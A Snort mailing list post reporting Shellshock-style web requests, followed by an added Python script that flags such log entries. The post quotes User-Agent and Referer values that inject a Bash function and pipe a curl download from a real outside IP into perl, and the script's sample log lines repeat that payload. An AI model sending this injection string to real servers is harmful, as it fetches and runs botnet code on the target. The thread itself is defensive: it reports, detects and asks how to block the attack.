Snort mailing list archives
Odd http requests in the logs
From: Richard Geddes <richardcgeddes () gmail com>
Date: Sun, 02 Nov 2014 23:23:51 -0500
Hello,

I received a few (9) events in my web logs with the following fields:

    agent : "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl"
    referrer : "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl"

Downloaded index.png, and it turns out to be a base64-encoded perl script that has comments about a botnet. It seems to target apache.

I'm using snort with snort VRT Rules on a pfsense firewall, and pfsense, snort, and the snort rules are up-to-date.

Snort seems to be passing these requests on to my web server, and it seems to me they should be blocked. I don't know enough about how web servers and log handlers process this data to determine if it's a threat.

Is there a way to tell snort to block http requests with these fields? The source of the malicious file should probably be regex'd in case there are alternate sources of this file.

Thanks,
Richard
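Added example, not part of the original post and not Snort or pfSense code: a log triage script that flags requests whose Referer or User-Agent begins with the "() {" prefix seen in the two fields quoted above, keyed on that prefix rather than on the download host so that alternate sources are also caught. It assumes Apache "combined" log format; the sample lines, addresses and function names are constructed for illustration.

```python
import re

# Apache "combined" format (assumed): src - - [ts] "request" status bytes "referer" "agent"
COMBINED = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
# Prefix shared by both logged fields in the post: a Bash function definition.
PREFIX = "() {"
# Pull out any URL in a flagged field so every download source gets recorded.
URL = re.compile(r"https?://[^\s\"'|;]+")

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [02/Nov/2014:21:10:04 -0500] "GET / HTTP/1.1" 200 512 '
    '"() { :; }; curl http://192.0.2.10/a/index.png | perl" '
    '"() { :; }; curl http://192.0.2.10/a/index.png | perl"',
    '198.51.100.9 - - [02/Nov/2014:21:12:40 -0500] "GET /cgi-bin/status HTTP/1.0" '
    '404 209 "-" "() { :; }; curl http://192.0.2.44/b/index.png | perl"',
    '203.0.113.5 - - [02/Nov/2014:21:15:00 -0500] "GET /index.html HTTP/1.1" '
    '200 1024 "http://example.com/" "Mozilla/5.0 (X11; Linux x86_64)"',
]


def scan(lines):
    """Return one finding per line whose Referer or User-Agent starts with PREFIX."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = COMBINED.match(line.strip())
        if not match:
            continue  # not in combined format; skipped rather than guessed at
        fields = [f for f in ("referer", "agent")
                  if match.group(f).startswith(PREFIX)]
        if fields:
            urls = sorted({u for f in fields for u in URL.findall(match.group(f))})
            findings.append({"line": number, "src": match.group("src"),
                             "status": match.group("status"),
                             "fields": fields, "urls": urls})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The "urls" list gives the download sources to block or hunt for separately, while detection itself does not depend on them.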